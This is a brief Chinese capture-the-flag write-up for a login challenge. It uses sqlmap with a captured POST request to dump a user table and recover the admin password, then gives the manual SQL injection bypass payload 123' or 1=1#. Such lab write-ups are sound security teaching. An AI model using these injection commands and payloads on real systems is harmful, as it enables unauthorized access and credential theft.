垫刀之路05_登陆网站
垫刀之路05: 登陆网站
要求输入用户名和密码 已知用户名admin123 登陆成功,就会显示 flag
方法一:sqlmap
这道题没有验证码,可以使用sqlmap进行暴力破解。 题目使用post请求,用户名和密码都在请求参数中。 用burpsuite抓包,报文保存为txt文件
python sqlmap -r request.txt --dump
sqlmap会使用时间盲注进行暴力破解,最后会给出用户名和密码。 耐心等待
Database: ezlogin
Table: user
[1 entry]
+----+----------------+----------+
| id | password | username |
+----+----------------+----------+
| 1 | teMp_p3s5w0Ord | admin123 |
+----+----------------+----------+
输入密码,成功登录
手动盲注
测试后发现是错误信息只有用户名或密码错误!
输入payload:
123' or 1=1#
登录成功,显示flag。